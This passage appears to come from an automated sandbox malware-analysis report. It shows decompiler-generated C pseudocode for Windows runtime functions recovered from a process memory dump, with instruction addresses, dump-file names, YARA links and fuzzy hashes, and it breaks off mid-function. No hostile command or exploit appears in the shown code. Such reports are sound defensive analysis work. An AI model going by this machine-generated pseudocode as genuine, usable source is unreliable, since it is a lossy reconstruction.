				E05362280(L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x54386b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E053895D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E053895D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E05349325();
					_t50 =  *0x54384c4; // 0x0
					return E0539D0D1(L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                      0x05349240
                                      0x05349242
                                      0x05349247
                                      0x0534924c
                                      0x0534924e
                                      0x05349255
                                      0x05349257
                                      0x0534925a
                                      0x0534925f
                                      0x0534925f
                                      0x05349266
                                      0x05349271
                                      0x05349276
                                      0x05349279
                                      0x0534927e
                                      0x05349295
                                      0x0534929a
                                      0x053492b1
                                      0x053492b6
                                      0x053492d7
                                      0x053492dc
                                      0x053492e0
                                      0x053492e6
                                      0x053492e8
                                      0x053492ee
                                      0x05349332
                                      0x05349333
                                      0x05349337
                                      0x05349338
                                      0x0534933a
                                      0x0534933a
                                      0x0534933d
                                      0x05349342
                                      0x05349342
                                      0x05349345
                                      0x05349349
                                      0x0534934e
                                      0x05349352
                                      0x05349357
                                      0x053492f4
                                      0x053492f4
                                      0x053492f6
                                      0x053492f9
                                      0x05349300
                                      0x05349306
                                      0x05349324
                                      0x05349324

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: bb927d7a9e34c473545b8ab504a236497939d5e09b19fc4d53e4db96897bd290
                                      • Instruction ID: f5e166084f0b1324d05d2dabaa6c02d8adc0c40767b548a4d3299eada4b89e0e
                                      • Opcode Fuzzy Hash: bb927d7a9e34c473545b8ab504a236497939d5e09b19fc4d53e4db96897bd290
                                      • Instruction Fuzzy Hash: 65214872251600EFC725EF68CA05F6AB7F9FF18704F144568A00A86AA1DB34E942DB44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053D4257, Relevance: .1, Instructions: 60COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 90%
                                      			E053D4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x54208d0);
				E0539D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E053D41E8(__ebx, __edi, __ecx, _t39);
				E0535EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x54387e4;
					_t18 =  *0x54387e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x5435cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x54387e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x54387e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L05347055(_t31 + 0xfffffff8);
								_t24 =  *0x54387e0; // 0x0
								_t18 = _t24 - 1;
								 *0x54387e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x5435cd0;
				if( *0x5435cd0 <= 0) {
					L05347055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x54387e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x54387e8 = _t30;
						 *0x54387e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0539D0D1(L053D4320());
			}















                                      0x053d4257
                                      0x053d4257
                                      0x053d4257
                                      0x053d4259
                                      0x053d425e
                                      0x053d4263
                                      0x053d4265
                                      0x053d4273
                                      0x053d4278
                                      0x053d427c
                                      0x053d427f
                                      0x053d4281
                                      0x053d4287
                                      0x053d42d7
                                      0x053d42d7
                                      0x053d42da
                                      0x053d428d
                                      0x053d428d
                                      0x053d428f
                                      0x053d4292
                                      0x053d4297
                                      0x053d429c
                                      0x053d42a0
                                      0x053d42a6
                                      0x053d42a8
                                      0x053d42ae
                                      0x053d42b3
                                      0x00000000
                                      0x053d42ba
                                      0x053d42ba
                                      0x053d42bf
                                      0x053d42c5
                                      0x053d42ca
                                      0x053d42cf
                                      0x053d42d0
                                      0x00000000
                                      0x053d42d0
                                      0x053d42b3
                                      0x00000000
                                      0x053d42a6
                                      0x053d429c
                                      0x053d42dc
                                      0x053d42dc
                                      0x053d42e3
                                      0x053d4309
                                      0x053d42e5
                                      0x053d42e5
                                      0x053d42e8
                                      0x053d42ee
                                      0x053d42f0
                                      0x00000000
                                      0x053d42f2
                                      0x053d42f2
                                      0x053d42f4
                                      0x053d42f7
                                      0x053d42f9
                                      0x053d4300
                                      0x053d4300
                                      0x053d42f0
                                      0x053d430e
                                      0x053d431f

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e7af3a9c35da2c7b5c60fed68091b07a96113dbe2842970ae7750e636be89e96
                                      • Instruction ID: ebb0210e99f679d36165d5eca1dd8b8fd7fdb9558ee87b4fcc9e8c23ea6d4a50
                                      • Opcode Fuzzy Hash: e7af3a9c35da2c7b5c60fed68091b07a96113dbe2842970ae7750e636be89e96
                                      • Instruction Fuzzy Hash: 26218E71616600CFCF19DF64E405AA4FFF2FB45354B50826EE1199B2A0DBB1E542CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053C46A7, Relevance: .1, Instructions: 59COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E053C46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L05364620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0538F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0537D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L053677F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                      0x053c46b7
                                      0x053c46ba
                                      0x053c46c5
                                      0x053c46c8
                                      0x053c46d0
                                      0x053c46d4
                                      0x053c46e6
                                      0x053c46e9
                                      0x053c46f4
                                      0x053c46ff
                                      0x053c4705
                                      0x053c4706
                                      0x053c470c
                                      0x053c4713
                                      0x053c471b
                                      0x053c4723
                                      0x053c4725
                                      0x053c46d6
                                      0x053c46d9
                                      0x053c46db
                                      0x053c46db
                                      0x053c4732

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                      • Instruction ID: 3ac850dae98c1fe4651c879cf9b52323834dbc106a4dea4fa740561af5b1efd7
                                      • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                      • Instruction Fuzzy Hash: E111E172A04208BBCB159F6CD8809BEBBB9EF95304F1080AEF984CB350DA359D55D7A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05372397, Relevance: .1, Instructions: 59COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 34%
                                      			E05372397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x543848c != 0) {
					L0536FAD0(0x5438610);
					if( *0x543848c == 0) {
						E0536FA00(0x5438610, _t19, _t27, 0x5438610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E05372581(0x5438610, 0x53250a0, _t26, _t27, _t28);
						E0536FA00(0x5438610, 0x53250a0, _t27, 0x5438610);
					}
				} else {
					L1:
					_t11 =  *0x5438614; // 0x1
					if(_t11 == 0) {
						_t11 = E05384886(0x5321088, 1, 0x5438614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E05372581(0x5438610, (_t11 << 4) + 0x5325070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                      0x053723b0
                                      0x053723b6
                                      0x05372409
                                      0x05372415
                                      0x053b5ae9
                                      0x00000000
                                      0x0537241b
                                      0x0537241b
                                      0x0537241d
                                      0x05372427
                                      0x0537242e
                                      0x05372430
                                      0x05372430
                                      0x053723b8
                                      0x053723b8
                                      0x053723b8
                                      0x053723bf
                                      0x053723fc
                                      0x053723fc
                                      0x053723c1
                                      0x053723c3
                                      0x053723d0
                                      0x053723d8
                                      0x053723d8
                                      0x053723dc
                                      0x053723de
                                      0x053723e1
                                      0x053723e1
                                      0x053723ec

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 923ce2e1b514704d27aaee39586687401972b47b947b9abe601f22096eef7910
                                      • Instruction ID: 42cf3401a8df9405e006722f816a499b84236dc0b058213372b286cc7d611b61
                                      • Opcode Fuzzy Hash: 923ce2e1b514704d27aaee39586687401972b47b947b9abe601f22096eef7910
                                      • Instruction Fuzzy Hash: 3B116B35B0430867E3309A29EC84F26F6DDFB50620F14802AF606A7690DBB8D8008754
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053837F5, Relevance: .1, Instructions: 57COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 87%
                                      			E053837F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E05362280(_t6, 0x5438550);
				}
				_t29 = E0538387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0535FFB0(0x5438550, _t27, 0x5438550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                      0x053837fa
                                      0x053837fc
                                      0x05383805
                                      0x05383808
                                      0x05383808
                                      0x05383814
                                      0x05383818
                                      0x05383846
                                      0x05383848
                                      0x0538384b
                                      0x0538384b
                                      0x05383852
                                      0x00000000
                                      0x05383854
                                      0x05383856
                                      0x00000000
                                      0x00000000
                                      0x05383863
                                      0x00000000
                                      0x05383863
                                      0x0538381a
                                      0x0538381a
                                      0x0538381f
                                      0x0538386e
                                      0x0538386e
                                      0x05383871
                                      0x05383873
                                      0x05383873
                                      0x05383868
                                      0x00000000
                                      0x05383868
                                      0x05383821
                                      0x05383826
                                      0x00000000
                                      0x00000000
                                      0x05383828
                                      0x0538382a
                                      0x05383841
                                      0x00000000
                                      0x05383841

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e73b3be2fa20dfd35b7387e2291d9e7f08810aff647a39a76a74b2a3f832e563
                                      • Instruction ID: 1692fe35b2dccbdf59e11ddd5ede9afbd88e9cd872a7d0eb57b20ec41bbfdfe8
                                      • Opcode Fuzzy Hash: e73b3be2fa20dfd35b7387e2291d9e7f08810aff647a39a76a74b2a3f832e563
                                      • Instruction Fuzzy Hash: 690126B2A467209BC33BAB19DD44E36BBA7EF85E60715486DE8458B314DB70C805C780
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0534C962, Relevance: .1, Instructions: 57COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 42%
                                      			E0534C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x543d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0535EEF0(0x54370a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E053CF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0535EB70(_t29, 0x54370a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0538B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E053CF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x54370c0; // 0x0
					while(_t38 != 0x54370c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x543b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                      0x0534c96a
                                      0x0534c974
                                      0x0534c988
                                      0x0534c98a
                                      0x053b7c9d
                                      0x053b7c9f
                                      0x053b7ca4
                                      0x053b7cae
                                      0x053b7cf0
                                      0x053b7cf5
                                      0x053b7cfa
                                      0x0534c992
                                      0x0534c996
                                      0x0534c997
                                      0x0534c998
                                      0x0534c9a3
                                      0x0534c9a3
                                      0x053b7cb0
                                      0x053b7cb7
                                      0x053b7cbb
                                      0x00000000
                                      0x00000000
                                      0x053b7cbd
                                      0x053b7ce8
                                      0x053b7cc5
                                      0x053b7cc8
                                      0x053b7cca
                                      0x053b7cd0
                                      0x053b7cd6
                                      0x053b7cde
                                      0x053b7ce4
                                      0x053b7ce4
                                      0x053b7cd0
                                      0x00000000
                                      0x053b7ce8
                                      0x0534c990
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ad62ad5a071378384fc7577dda5cab48f4c7554aa921b4cfec86c20be4d140df
                                      • Instruction ID: e8d8318e662adc49afccfe454695539dfa9303d4ad23616bc8250aba8736f8f5
                                      • Opcode Fuzzy Hash: ad62ad5a071378384fc7577dda5cab48f4c7554aa921b4cfec86c20be4d140df
                                      • Instruction Fuzzy Hash: 6511293131460A9BD754AF28CC45AAB7BF6FBC4650B00017DF98197A60DFA0ED14D7C1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0537002D, Relevance: .1, Instructions: 55COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0537002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E05367D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E05367D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E05367D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E05367D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                      0x05370032
                                      0x05370037
                                      0x05370043
                                      0x053b4b3a
                                      0x05370049
                                      0x05370049
                                      0x05370049
                                      0x0537004e
                                      0x05370053
                                      0x053b4b48
                                      0x053b4b5a
                                      0x053b4b4a
                                      0x053b4b53
                                      0x053b4b53
                                      0x053b4b5f
                                      0x00000000
                                      0x053b4b61
                                      0x00000000
                                      0x053b4b61
                                      0x05370059
                                      0x05370059
                                      0x05370060
                                      0x053b4b6f
                                      0x053b4b6f
                                      0x05370069
                                      0x053b4b83
                                      0x00000000
                                      0x00000000
                                      0x053b4b90
                                      0x053b4b9b
                                      0x053b4b9b
                                      0x053b4ba4
                                      0x00000000
                                      0x00000000
                                      0x053b4baa
                                      0x00000000
                                      0x0537006f
                                      0x0537006f
                                      0x00000000
                                      0x0537006f
                                      0x05370069

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                      • Instruction ID: a43763a9383e98cf7e1eed2009e4f6844b2ee667f05e7882f9bb3ea33f90d7d4
                                      • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                      • Instruction Fuzzy Hash: 5B11E5316056848FFB22C768C558B757BABFB417A8F0900A4DF4587E93E7AEC841C758
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0535766D, Relevance: .1, Instructions: 54COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E0535766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0537F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0537F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L05364620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                      0x05357672
                                      0x0535767f
                                      0x05357689
                                      0x053576de
                                      0x053576de
                                      0x0535768b
                                      0x05357691
                                      0x05357693
                                      0x05357697
                                      0x00000000
                                      0x05357699
                                      0x053576a8
                                      0x00000000
                                      0x053576aa
                                      0x053576ad
                                      0x053576b1
                                      0x00000000
                                      0x053576b3
                                      0x053576b3
                                      0x053576b5
                                      0x053576ba
                                      0x053576bc
                                      0x053576bc
                                      0x053576c0
                                      0x00000000
                                      0x053576c2
                                      0x053576ce
                                      0x053576ce
                                      0x053576c0
                                      0x053576b1
                                      0x053576a8
                                      0x05357697
                                      0x053576d9

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                      • Instruction ID: 2b00a654279e3d218d3672e062b10b31c460980da52b5e8795d10fd433cefee4
                                      • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                      • Instruction Fuzzy Hash: A501DF32710118ABC720DE6ECC54E5B77ADFB84AB0B250124BD09EB244DA30DC0583A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053DC450, Relevance: .1, Instructions: 53COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 46%
                                      			E053DC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E05389910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E053895B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E053895D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E053895D0();
				return L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                      0x053dc458
                                      0x053dc45d
                                      0x053dc466
                                      0x053dc468
                                      0x053dc469
                                      0x053dc46a
                                      0x053dc46b
                                      0x053dc46e
                                      0x053dc46f
                                      0x053dc471
                                      0x053dc476
                                      0x053dc476
                                      0x053dc47c
                                      0x053dc47e
                                      0x053dc480
                                      0x053dc480
                                      0x053dc483
                                      0x053dc484
                                      0x053dc486
                                      0x053dc488
                                      0x053dc48f
                                      0x053dc491
                                      0x053dc493
                                      0x053dc493
                                      0x053dc48f
                                      0x053dc498
                                      0x053dc49e
                                      0x053dc4ad
                                      0x053dc4ad
                                      0x053dc4b2
                                      0x053dc4b4
                                      0x053dc4cd

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                      • Instruction ID: b43a2ad2631ffdc14bf073f7b69d67cbc2252214602824c7488d318ec446dad9
                                      • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                      • Instruction Fuzzy Hash: 33019E73240609BFD726AF65CC84E72F77DFF54394F008529F215829A0CB66ACA1CAB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05349080, Relevance: .1, Instructions: 53COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 69%
                                      			E05349080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x54385ec;
				E05362280(_t48, 0x54385ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0535FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x543538c; // 0x35ae350
					if( *_t84 != 0x5435388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x541f6e8);
						E0539D0E8(0x54385ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E054188F5(_t80, _t85, 0x5435388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x54386c0; // 0x35907b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x54386b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
